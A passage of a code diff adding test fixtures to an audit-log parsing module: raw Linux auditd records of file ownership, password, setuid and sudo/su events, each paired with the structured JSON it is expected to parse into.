"1000", + "ouid": "9999", + "rdev": "00:00" + } + ], + "result": "success", + "sequence": 263, + "session": "8", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "root" + }, + "how": "/usr/bin/chown", + "object": { + "primary": "test", + "type": "file" + } + } + }, + "event": { + "action": "changed-file-ownership-of", + "category": [ + "file" + ], + "kind": "event", + "original": [ + "type=SYSCALL msg=audit(1611091464.740:263): arch=c000003e syscall=260 success=yes exit=0 a0=ffffffffffffff9c a1=12d6210 a2=3e9 a3=ffffffff items=1 ppid=9492 pid=9494 auid=1000 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts2 ses=8 comm=\"chown\" exe=\"/usr/bin/chown\" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=\"access\"", + "type=CWD msg=audit(1611091464.740:263): cwd=\"/home/vagrant\"", + "type=PATH msg=audit(1611091464.740:263): item=0 name=\"test\" inode=921833 dev=fd:02 mode=0100664 ouid=9999 ogid=1000 rdev=00:00 obj=unconfined_u:object_r:user_home_t:s0 objtype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0", + "type=PROCTITLE msg=audit(1611091464.740:263): proctitle=63686F776E002D5200616C6963650074657374" + ], + "outcome": "success", + "type": [ + "change" + ] + }, + "file": { + "device": "00:00", + "gid": "1000", + "group": "vagrant", + "inode": "921833", + "mode": "0664", + "owner": "bob", + "path": "test", + "selinux": { + "domain": "user_home_t", + "level": "s0", + "role": "object_r", + "user": "unconfined_u" + }, + "uid": "9999" + }, + "process": { + "executable": "/usr/bin/chown", + "name": "chown", + "pid": 9494, + "ppid": 9492, + "title": "chown -R alice test", + "working_directory": "/home/vagrant" + }, + "service": { + "type": "auditd" + }, + "tags": [ + "access" + ], + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "filesystem": { + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root" + }, + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root", + "saved": { + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root" + }, + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + } + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/passwd.log b/auditbeat/module/auditd/testdata/passwd.log new file mode 100644 index 000000000000..6ae44815ba49 --- /dev/null +++ b/auditbeat/module/auditd/testdata/passwd.log @@ -0,0 +1,4 @@ +type=USER_CHAUTHTOK msg=audit(1610986912.458:797): pid=13107 uid=0 auid=1002 ses=15 msg='op=PAM:chauthtok acct="bob" exe="/usr/bin/passwd" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/1 res=success' +type=USER_CHAUTHTOK msg=audit(1610987544.541:805): pid=13379 uid=0 auid=1000 ses=14 msg='op=changing comment id=1003 exe="/usr/sbin/usermod" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success' +type=USER_CHAUTHTOK msg=audit(1610987708.643:810): pid=13519 uid=0 auid=1000 ses=14 msg='op=changing name id=1003 exe="/usr/sbin/usermod" hostname=ubuntu-bionic addr=? terminal=pts/2 res=success' +type=USER_ACCT msg=audit(1610988774.279:815): pid=13812 uid=0 auid=1000 ses=14 msg='op=changing /etc/group; group bob/1003, new name: bobby acct="bob" exe="/usr/sbin/groupmod" hostname=ubuntu-bionic addr=? terminal=pts/2 res=success' diff --git a/auditbeat/module/auditd/testdata/passwd.log-expected.json b/auditbeat/module/auditd/testdata/passwd.log-expected.json new file mode 100644 index 000000000000..d12ceeb57396 --- /dev/null +++ b/auditbeat/module/auditd/testdata/passwd.log-expected.json @@ -0,0 +1,282 @@ +[ + { + "auditd": { + "data": { + "acct": "bob", + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "op": "PAM:chauthtok", + "terminal": "pts/1" + }, + "message_type": "user_chauthtok", + "result": "success", + "sequence": 797, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "bob" + }, + "how": "/usr/bin/passwd", + "object": { + "primary": "pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-password", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_CHAUTHTOK msg=audit(1610986912.458:797): pid=13107 uid=0 auid=1002 ses=15 msg='op=PAM:chauthtok acct=\"bob\" exe=\"/usr/bin/passwd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/bin/passwd", + "pid": 13107 + }, + "related": { + "user": [ + "bob", + "oldbob", + "root" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1002", + "name": "oldbob", + "target": { + "id": "9999", + "name": "bob" + } + } + }, + { + "auditd": { + "data": { + "addr": "127.0.0.1", + "hostname": "ubuntu-bionic", + "id": "1003", + "op": "changing", + "terminal": "pts/2" + }, + "message_type": "user_chauthtok", + "result": "success", + "sequence": 805, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "charlie" + }, + "how": "/usr/sbin/usermod", + "object": { + "primary": "pts/2", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-password", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_CHAUTHTOK msg=audit(1610987544.541:805): pid=13379 uid=0 auid=1000 ses=14 msg='op=changing comment id=1003 exe=\"/usr/sbin/usermod\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/sbin/usermod", + "pid": 13379 + }, + "related": { + "user": [ + "charlie", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "target": { + "id": "1003", + "name": "charlie" + } + } + }, + { + "auditd": { + "data": { + "hostname": "ubuntu-bionic", + "id": "1003", + "op": "changing", + "terminal": "pts/2" + }, + "message_type": "user_chauthtok", + "result": "success", + "sequence": 810, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "charlie" + }, + "how": "/usr/sbin/usermod", + "object": { + "primary": "pts/2", + "secondary": "ubuntu-bionic", + "type": "user-session" + } + } + }, + "event": { + "action": "changed-password", + "category": [ + "iam" + ], + "kind": "event", + "original": [ + "type=USER_CHAUTHTOK msg=audit(1610987708.643:810): pid=13519 uid=0 auid=1000 ses=14 msg='op=changing name id=1003 exe=\"/usr/sbin/usermod\" hostname=ubuntu-bionic addr=? terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "user", + "change" + ] + }, + "process": { + "executable": "/usr/sbin/usermod", + "pid": 13519 + }, + "related": { + "user": [ + "charlie", + "root", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "target": { + "id": "1003", + "name": "charlie" + } + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "hostname": "ubuntu-bionic", + "op": "changing", + "terminal": "pts/2" + }, + "message_type": "user_acct", + "result": "success", + "sequence": 815, + "session": "14", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "bob" + }, + "how": "/usr/sbin/groupmod", + "object": { + "primary": "pts/2", + "secondary": "ubuntu-bionic", + "type": "user-session" + } + } + }, + "event": { + "action": "was-authorized", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_ACCT msg=audit(1610988774.279:815): pid=13812 uid=0 auid=1000 ses=14 msg='op=changing /etc/group; group bob/1003, new name: bobby acct=\"bob\" exe=\"/usr/sbin/groupmod\" hostname=ubuntu-bionic addr=? terminal=pts/2 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/sbin/groupmod", + "pid": 13812 + }, + "related": { + "user": [ + "bob", + "vagrant" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "id": "9999", + "name": "bob" + }, + "id": "1000", + "name": "vagrant" + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/setuid.log b/auditbeat/module/auditd/testdata/setuid.log new file mode 100644 index 000000000000..1e0292a8e679 --- /dev/null +++ b/auditbeat/module/auditd/testdata/setuid.log @@ -0,0 +1,6 @@ +type=SYSCALL msg=audit(1611163038.267:531): arch=c000003e syscall=106 success=yes exit=0 a0=0 a1=3e8 a2=ffffffffffffffff a3=7ffe354fcc60 items=0 ppid=1541 pid=19930 auid=1000 uid=1000 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=1 comm="setuids" exe="/tmp/setuids" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key="access" +type=PROCTITLE msg=audit(1611163038.267:531): proctitle="/tmp/setuids" +type=SYSCALL msg=audit(1611163038.267:529): arch=c000003e syscall=117 success=yes exit=0 a0=ffffffffffffffff a1=3e8 a2=ffffffffffffffff a3=7ffe354fcc60 items=0 ppid=1541 pid=19930 auid=1000 uid=1000 gid=1000 euid=1000 suid=0 fsuid=1000 egid=0 sgid=0 fsgid=0 tty=pts0 ses=1 comm="setuids" exe="/tmp/setuids" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key="access" +type=PROCTITLE msg=audit(1611163038.267:529): proctitle="/tmp/setuids" +type=SYSCALL msg=audit(1611163038.267:530): arch=c000003e syscall=105 success=yes exit=0 a0=0 a1=3e8 a2=ffffffffffffffff a3=7ffe354fcc60 items=0 ppid=1541 pid=19930 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=0 fsgid=1000 tty=pts0 ses=1 comm="setuids" exe="/tmp/setuids" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key="access" +type=PROCTITLE msg=audit(1611163038.267:530): proctitle="/tmp/setuids" diff --git a/auditbeat/module/auditd/testdata/setuid.log-expected.json b/auditbeat/module/auditd/testdata/setuid.log-expected.json new file mode 100644 index 000000000000..f5d29f8453ee --- /dev/null +++ b/auditbeat/module/auditd/testdata/setuid.log-expected.json @@ -0,0 +1,291 @@ +[ + { + "auditd": { + "data": { + "a0": "0", + "a1": "3e8", + "a2": "ffffffffffffffff", + "a3": "7ffe354fcc60", + "arch": "x86_64", + "exit": "0", + "syscall": "setgid", + "tty": "pts0" + }, + "message_type": "syscall", + "result": "success", + "sequence": 531, + "session": "1", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "vagrant" + }, + "how": "setgid", + "object": { + "type": "process" + } + } + }, + "event": { + "action": "changed-identity-of", + "category": [ + "process" + ], + "kind": "event", + "original": [ + "type=SYSCALL msg=audit(1611163038.267:531): arch=c000003e syscall=106 success=yes exit=0 a0=0 a1=3e8 a2=ffffffffffffffff a3=7ffe354fcc60 items=0 ppid=1541 pid=19930 auid=1000 uid=1000 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=pts0 ses=1 comm=\"setuids\" exe=\"/tmp/setuids\" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=\"access\"", + "type=PROCTITLE msg=audit(1611163038.267:531): proctitle=\"/tmp/setuids\"" + ], + "outcome": "success", + "type": [ + "change" + ] + }, + "process": { + "executable": "/tmp/setuids", + "name": "setuids", + "pid": 19930, + "ppid": 1541, + "title": "/tmp/setuids" + }, + "service": { + "type": "auditd" + }, + "tags": [ + "access" + ], + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root" + }, + "filesystem": { + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root" + }, + "group": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant", + "saved": { + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root" + }, + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + } + } + }, + { + "auditd": { + "data": { + "a0": "ffffffffffffffff", + "a1": "3e8", + "a2": "ffffffffffffffff", + "a3": "7ffe354fcc60", + "arch": "x86_64", + "exit": "0", + "syscall": "setresuid", + "tty": "pts0" + }, + "message_type": "syscall", + "result": "success", + "sequence": 529, + "session": "1", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "vagrant" + }, + "how": "setresuid", + "object": { + "type": "process" + } + } + }, + "event": { + "action": "changed-identity-of", + "category": [ + "process" + ], + "kind": "event", + "original": [ + "type=SYSCALL msg=audit(1611163038.267:529): arch=c000003e syscall=117 success=yes exit=0 a0=ffffffffffffffff a1=3e8 a2=ffffffffffffffff a3=7ffe354fcc60 items=0 ppid=1541 pid=19930 auid=1000 uid=1000 gid=1000 euid=1000 suid=0 fsuid=1000 egid=0 sgid=0 fsgid=0 tty=pts0 ses=1 comm=\"setuids\" exe=\"/tmp/setuids\" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=\"access\"", + "type=PROCTITLE msg=audit(1611163038.267:529): proctitle=\"/tmp/setuids\"" + ], + "outcome": "success", + "type": [ + "change" + ] + }, + "process": { + "executable": "/tmp/setuids", + "name": "setuids", + "pid": 19930, + "ppid": 1541, + "title": "/tmp/setuids" + }, + "service": { + "type": "auditd" + }, + "tags": [ + "access" + ], + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "filesystem": { + "group": { + "id": "0", + "name": "root" + }, + "id": "1000", + "name": "vagrant" + }, + "group": { + "id": "1000", + "name": "vagrant" + }, + "id": "1000", + "name": "vagrant", + "saved": { + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root" + }, + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + } + } + }, + { + "auditd": { + "data": { + "a0": "0", + "a1": "3e8", + "a2": "ffffffffffffffff", + "a3": "7ffe354fcc60", + "arch": "x86_64", + "exit": "0", + "syscall": "setuid", + "tty": "pts0" + }, + "message_type": "syscall", + "result": "success", + "sequence": 530, + "session": "1", + "summary": { + "actor": { + "primary": "vagrant", + "secondary": "vagrant" + }, + "how": "setuid", + "object": { + "type": "process" + } + } + }, + "event": { + "action": "changed-identity-of", + "category": [ + "process" + ], + "kind": "event", + "original": [ + "type=SYSCALL msg=audit(1611163038.267:530): arch=c000003e syscall=105 success=yes exit=0 a0=0 a1=3e8 a2=ffffffffffffffff a3=7ffe354fcc60 items=0 ppid=1541 pid=19930 auid=1000 uid=1000 gid=1000 euid=0 suid=0 fsuid=0 egid=1000 sgid=0 fsgid=1000 tty=pts0 ses=1 comm=\"setuids\" exe=\"/tmp/setuids\" subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 key=\"access\"", + "type=PROCTITLE msg=audit(1611163038.267:530): proctitle=\"/tmp/setuids\"" + ], + "outcome": "success", + "type": [ + "change" + ] + }, + "process": { + "executable": "/tmp/setuids", + "name": "setuids", + "pid": 19930, + "ppid": 1541, + "title": "/tmp/setuids" + }, + "service": { + "type": "auditd" + }, + "tags": [ + "access" + ], + "user": { + "audit": { + "id": "1000", + "name": "vagrant" + }, + "effective": { + "group": { + "id": "1000", + "name": "vagrant" + }, + "id": "0", + "name": "root" + }, + "filesystem": { + "group": { + "id": "1000", + "name": "vagrant" + }, + "id": "0", + "name": "root" + }, + "group": { + "id": "1000", + "name": "vagrant" + }, + "id": "1000", + "name": "vagrant", + "saved": { + "group": { + "id": "0", + "name": "root" + }, + "id": "0", + "name": "root" + }, + "selinux": { + "category": "c0.c1023", + "domain": "unconfined_t", + "level": "s0-s0", + "role": "unconfined_r", + "user": "unconfined_u" + } + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/sudo-asuser.log b/auditbeat/module/auditd/testdata/sudo-asuser.log new file mode 100644 index 000000000000..f9e02e9469ab --- /dev/null +++ b/auditbeat/module/auditd/testdata/sudo-asuser.log @@ -0,0 +1,5 @@ +type=USER_AUTH msg=audit(1610876676.623:458): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct="alice" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_ACCT msg=audit(1610876676.623:459): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:accounting acct="alice" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_CMD msg=audit(1610876676.623:460): pid=14178 uid=1002 auid=1002 ses=15 msg='cwd="/home/alice" cmd="bash" terminal=pts/1 res=success' +type=CRED_REFR msg=audit(1610876676.623:461): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct="bob" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_START msg=audit(1610876676.623:462): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct="bob" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' diff --git a/auditbeat/module/auditd/testdata/sudo-asuser.log-expected.json b/auditbeat/module/auditd/testdata/sudo-asuser.log-expected.json new file mode 100644 index 000000000000..61aa7ffbdb51 --- /dev/null +++ b/auditbeat/module/auditd/testdata/sudo-asuser.log-expected.json @@ -0,0 +1,322 @@ +[ + { + "auditd": { + "data": { + "acct": "alice", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:authentication", + "terminal": "/dev/pts/1" + }, + "message_type": "user_auth", + "result": "success", + "sequence": 458, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "alice" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "authenticated", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_AUTH msg=audit(1610876676.623:458): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct=\"alice\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "alice", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "alice", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:accounting", + "terminal": "/dev/pts/1" + }, + "message_type": "user_acct", + "result": "success", + "sequence": 459, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "alice" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "was-authorized", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_ACCT msg=audit(1610876676.623:459): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:accounting acct=\"alice\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "alice", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "cmd": "bash", + "terminal": "pts/1" + }, + "message_type": "user_cmd", + "result": "success", + "sequence": 460, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "oldbob" + }, + "object": { + "primary": "bash", + "type": "process" + } + } + }, + "event": { + "action": "ran-command", + "category": [ + "process" + ], + "kind": "event", + "original": [ + "type=USER_CMD msg=audit(1610876676.623:460): pid=14178 uid=1002 auid=1002 ses=15 msg='cwd=\"/home/alice\" cmd=\"bash\" terminal=pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "process": { + "pid": 14178, + "working_directory": "/home/alice" + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:setcred", + "terminal": "/dev/pts/1" + }, + "message_type": "cred_refr", + "result": "success", + "sequence": 461, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "bob" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "refreshed-credentials", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=CRED_REFR msg=audit(1610876676.623:461): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct=\"bob\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "bob", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "9999", + "name": "bob" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "bob", + "hostname": "localhost", + "op": "PAM:session_open", + "terminal": "/dev/pts/1" + }, + "message_type": "user_start", + "result": "success", + "sequence": 462, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "bob" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "started-session", + "category": [ + "session" + ], + "kind": "event", + "original": [ + "type=USER_START msg=audit(1610876676.623:462): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct=\"bob\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "start" + ] + }, + "network": { + "direction": "ingress" + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "bob", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "source": { + "ip": "127.0.0.1" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "9999", + "name": "bob" + }, + "id": "1002", + "name": "oldbob" + } + } +] \ No newline at end of file diff --git a/auditbeat/module/auditd/testdata/sudo.log b/auditbeat/module/auditd/testdata/sudo.log new file mode 100644 index 000000000000..086e7683f4c9 --- /dev/null +++ b/auditbeat/module/auditd/testdata/sudo.log @@ -0,0 +1,20 @@ +type=USER_AUTH msg=audit(1610876676.623:458): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct="alice" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_ACCT msg=audit(1610876676.623:459): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:accounting acct="alice" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_CMD msg=audit(1610876676.623:460): pid=14178 uid=1002 auid=1002 ses=15 msg='cwd="/home/alice" cmd="bash" terminal=pts/1 res=success' +type=CRED_REFR msg=audit(1610876676.623:461): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct="bob" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_START msg=audit(1610876676.623:462): pid=14178 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct="bob" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_AUTH msg=audit(1610876634.103:457): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct="alice" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=failed' +type=CRED_ACQ msg=audit(1610735886.818:434): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_ACCT msg=audit(1610735886.818:433): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:accounting acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_AUTH msg=audit(1610735886.818:432): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:authentication acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_START msg=audit(1610735886.818:431): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=CRED_REFR msg=audit(1610735886.818:430): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_CMD msg=audit(1610735886.818:429): pid=11791 uid=1002 auid=1002 ses=15 msg='cwd="/home/alice" cmd="su" terminal=pts/1 res=success' +type=USER_ACCT msg=audit(1610735886.818:428): pid=11791 uid=1002 auid=1002 ses=15 msg='op=PAM:accounting acct="alice" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_AUTH msg=audit(1610735886.818:427): pid=11791 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct="alice" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_ROLE_CHANGE msg=audit(1610735886.822:436): pid=11793 uid=0 auid=1002 ses=15 msg='op=su acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success selected-context=1234' +type=USER_START msg=audit(1610735886.822:435): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:session_open acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=CRED_DISP msg=audit(1610735949.474:440): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_END msg=audit(1610735949.474:439): pid=11791 uid=0 auid=1002 ses=15 msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=CRED_DISP msg=audit(1610735949.474:438): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:setcred acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' +type=USER_END msg=audit(1610735949.474:437): pid=11792 uid=0 auid=1002 ses=15 msg='op=PAM:session_close acct="root" exe="/bin/su" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success' diff --git a/auditbeat/module/auditd/testdata/sudo.log-expected.json b/auditbeat/module/auditd/testdata/sudo.log-expected.json new file mode 100644 index 000000000000..838e8b1831ae --- /dev/null +++ b/auditbeat/module/auditd/testdata/sudo.log-expected.json @@ -0,0 +1,1293 @@ +[ + { + "auditd": { + "data": { + "acct": "alice", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:authentication", + "terminal": "/dev/pts/1" + }, + "message_type": "user_auth", + "result": "success", + "sequence": 458, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "alice" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "authenticated", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_AUTH msg=audit(1610876676.623:458): pid=14178 uid=1002 auid=1002 ses=15 msg='op=PAM:authentication acct=\"alice\" exe=\"/usr/bin/sudo\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/1 res=success'" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "process": { + "executable": "/usr/bin/sudo", + "pid": 14178 + }, + "related": { + "user": [ + "alice", + "oldbob" + ] + }, + "service": { + "type": "auditd" + }, + "user": { + "audit": { + "id": "1002", + "name": "oldbob" + }, + "effective": { + "id": "1001", + "name": "alice" + }, + "id": "1002", + "name": "oldbob" + } + }, + { + "auditd": { + "data": { + "acct": "alice", + "addr": "127.0.0.1", + "hostname": "localhost", + "op": "PAM:accounting", + "terminal": "/dev/pts/1" + }, + "message_type": "user_acct", + "result": "success", + "sequence": 459, + "session": "15", + "summary": { + "actor": { + "primary": "oldbob", + "secondary": "alice" + }, + "how": "/usr/bin/sudo", + "object": { + "primary": "/dev/pts/1", + "secondary": "127.0.0.1", + "type": "user-session" + } + } + }, + "event": { + "action": "was-authorized", + "category": [ + "authentication" + ], + "kind": "event", + "original": [ + "type=USER_ACCT 